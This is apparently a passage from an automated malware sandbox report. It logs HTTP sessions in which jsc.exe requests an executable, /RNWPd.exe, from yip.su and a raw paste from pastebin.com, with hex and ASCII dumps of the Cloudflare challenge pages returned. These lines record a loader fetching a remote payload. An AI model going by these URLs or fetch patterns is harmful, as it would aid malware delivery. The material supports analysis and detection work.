                                    2024-08-17 22:10:53 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:10:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    58192.168.2.549785188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:10:53 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:10:53 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:10:53 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:10:53 UTC685INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 61 47 69 33 2b 72 42 45 6a 6c 43 4a 36 65 58 45 63 7a 57 4b 50 61 31 35 42 6e 52 4e 49 67 30 57 4c 4b 41 62 4c 41 57 7a 70 45 2b 72 49 5a 70 55 47 67 54 6b 7a 32 6c 66 5a 66 49 56 57 67 6e 43 75 62 66 35 47 63 7a 46 61 6b 63 6e 69 49 39 64 61 39 67 6b 4b 34 51 74 42 77 48 2f 54 75 45 50 33 35 2f 38 6d 35 7a 6d 61 34 4d 3d 24 36 4c 73 66 4d 6a 68 44 78 43 38 31 50 6e 6a 72 2b 4e 47 32 7a 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: aGi3+rBEjlCJ6eXEczWKPa15BnRNIg0WLKAbLAWzpE+rIZpUGgTkz2lfZfIVWgnCubf5GczFakcniI9da9gkK4QtBwH/TuEP35/8m5zma4M=$6LsfMjhDxC81Pnjr+NG2zg==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:10:53 UTC1369INData Raw: 33 64 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3dfc<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:10:53 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:10:53 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:10:53 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:10:53 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:10:53 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:10:53 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:10:53 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 36 31 38 36 38 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 66 32 64 61 64 36 65 34 32 38 38 27 2c 63 48 61 73 68 3a 20 27 35 63 33 62 31 65 39 66 37 34 37 65 30 39 63 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 47 77 31 6a 72 4e 65 7a 37 5a 6f 64 38 71 54 47 61 44 30 6c 76 5a 56 4a 54 41 64 53 6a 76 43 2e 72 33 57 50 54 43 74 44 54 78 6f 2d 31 37 32 33 39 33 32 36 35 33 2d 30 2e 30 2e 31 2e 31 2d 34 31 33 37 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '61868',cRay: '8b4cff2dad6e4288',cHash: '5c3b1e9f747e09c',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=Gw1jrNez7Zod8qTGaD0lvZVJTAdSjvC.r3WPTCtDTxo-1723932653-0.0.1.1-4137",cFPWv: 'g',cTTim
                                    2024-08-17 22:10:53 UTC1369INData Raw: 4b 53 52 2e 64 69 67 55 34 6c 7a 41 48 54 47 7a 2e 73 62 63 41 59 72 55 36 67 48 42 34 54 68 46 56 66 59 2e 38 6f 4d 6c 2e 45 73 36 46 41 44 71 4b 36 4f 48 33 49 73 67 45 55 35 48 5f 45 56 52 68 39 5f 74 5f 57 52 57 6d 78 6c 58 68 58 71 6b 63 4f 45 54 36 38 67 63 2e 57 64 35 63 70 6f 67 45 4e 77 4a 50 79 4f 70 72 2e 74 4b 5f 35 33 44 4f 48 5f 35 78 44 6e 36 57 4b 4d 31 79 34 6a 78 32 6e 35 46 6e 39 6b 61 54 33 68 77 39 57 79 77 32 2e 6b 61 4d 4e 47 58 43 4f 72 4e 72 51 36 43 4c 45 55 6e 30 38 6e 42 6e 6c 79 4c 36 4f 65 67 68 61 35 6e 39 53 57 31 73 79 54 49 34 30 5a 5a 36 4a 67 59 76 57 6e 72 56 4b 61 49 47 48 61 37 34 77 56 70 37 4f 31 4f 70 45 32 46 78 4b 2e 43 7a 70 6b 72 71 36 65 44 6f 66 4c 32 42 5a 4c 71 32 37 58 59 47 64 59 49 58 66 5f 58 67 54 32
                                    Data Ascii: KSR.digU4lzAHTGz.sbcAYrU6gHB4ThFVfY.8oMl.Es6FADqK6OH3IsgEU5H_EVRh9_t_WRWmxlXhXqkcOET68gc.Wd5cpogENwJPyOpr.tK_53DOH_5xDn6WKM1y4jx2n5Fn9kaT3hw9Wyw2.kaMNGXCOrNrQ6CLEUn08nBnlyL6Oegha5n9SW1syTI40ZZ6JgYvWnrVKaIGHa74wVp7O1OpE2FxK.Czpkrq6eDofL2BZLq27XYGdYIXf_XgT2


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    59192.168.2.549786104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:10:59 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:10:59 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:10:59 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cff513b5b17e9-EWR
                                    2024-08-17 22:10:59 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:10:59 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:10:59 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:10:59 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:10:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    60192.168.2.549787188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:10:59 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:11:00 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:11:00 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:11:00 UTC677INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 63 61 7a 44 75 35 52 6f 6f 31 38 33 52 57 6d 61 47 6f 76 48 4b 55 50 49 4b 79 62 4e 4c 51 46 59 50 2b 5a 71 65 6e 45 67 68 69 57 62 4b 36 4f 36 67 4a 52 31 45 63 73 73 56 6b 33 54 34 65 49 46 6f 34 6f 32 32 52 35 45 66 53 49 31 56 53 78 36 66 46 45 51 36 50 4a 50 52 39 6b 57 43 6a 56 73 4c 4b 70 2b 75 46 43 77 56 30 6b 3d 24 38 72 59 4b 41 7a 68 4c 4a 73 50 4b 68 57 63 51 49 46 75 74 74 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
